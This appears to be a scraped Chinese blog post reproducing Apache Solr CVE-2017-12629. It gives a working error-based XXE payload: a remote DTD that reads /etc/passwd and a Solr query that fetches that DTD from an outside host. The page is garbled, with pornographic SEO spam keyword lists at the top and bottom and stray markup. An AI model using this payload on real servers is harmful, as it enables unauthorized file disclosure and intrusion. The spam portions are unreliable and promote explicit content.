<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      【Apache Solr CVE-2017-12629】

      Apache Solr 是一個(gè)開源的搜索服務(wù)器。Solr 使用 Java 語言開發(fā),主要基于 HTTP 和 Apache Lucene 實(shí)現(xiàn)。原理大致是文檔通過 Http 利用 XML 加到一個(gè)搜索集合中。查詢?cè)摷弦彩峭ㄟ^ http 收到一個(gè) XML/JSON 響應(yīng)來實(shí)現(xiàn)。此次 7.1.0 之前版本總共爆出兩個(gè)漏洞:XML 實(shí)體擴(kuò)展漏洞(XXE)和遠(yuǎn)程命令執(zhí)行漏洞(RCE),二者可以連接成利用鏈,編號(hào)均為 CVE-2017-12629。

       

       

       

      漏洞復(fù)現(xiàn):

      利用 Error Based XXE 讀取文件:

      遠(yuǎn)程服務(wù)器

      passwd.dtd

      <!ENTITY % file SYSTEM "file:///etc/passwd">
      <!ENTITY % ent "<!ENTITY data SYSTEM ':%file;'>">

      payload 對(duì)q參數(shù)url編碼

      /solr/demo/select?&q=<?xml version="1.0" ?><!DOCTYPE root[<!ENTITY % ext SYSTEM "http://1.:8777/passwd.dtd">%ext;%ent;]><r>&data;</r>&wt=xml&defType=xmlparser

       

      posted @ 2023-07-11 17:31  任爾東西南北風(fēng)  閱讀(72)  評(píng)論(0)    收藏  舉報(bào)
      主站蜘蛛池模板: 2021国产精品视频网站| 中文国产成人精品久久不卡 | 一级片黄色一区二区三区| 成人性影院| 欧美福利在线| 国产超碰无码最新上传| 成人一区二区三区久久精品 | 久久99热只有频精品6狠狠| 无码人妻精品一区二区三区下载| 亚洲乱码国产乱码精品精| 亚洲精品国产一二三区| 自拍偷拍一区二区三区四| 久久道精品一区二区三区| 日本真人做爰免费视频120秒| 精品人妻日韩中文字幕| 夜色福利站WWW国产在线视频| 国产SUV精品一区二区88L| 五月丁香啪啪| 精品嫩模福利一区二区蜜臀| 久久免费偷拍视频有没有| 亚洲AV无码东方伊甸园| 中文字幕制服国产精品| 施秉县| 国产精品一区二区三区黄| 亚洲最大的熟女水蜜桃AV网站| 黄大仙区| 国产 麻豆 日韩 欧美 久久| 白白色发布永久免费观看视频 | 亚洲欧美在线一区中文字幕| 中文字幕乱码无码人妻系列蜜桃 | 精品国产一区二区三区av性色 | 极品少妇被猛得白浆直流草莓视频| 欧美成人午夜在线观看视频| 国产永久免费高清在线观看| 久久婷婷大香萑太香蕉AV人| 久久综合亚洲鲁鲁九月天| 玩弄放荡人妻少妇系列| 国产熟女丝袜av一二区| aⅴ精品无码无卡在线观看| 国产精品日日摸夜夜添夜夜添无码 | 天堂在线www天堂中文在线|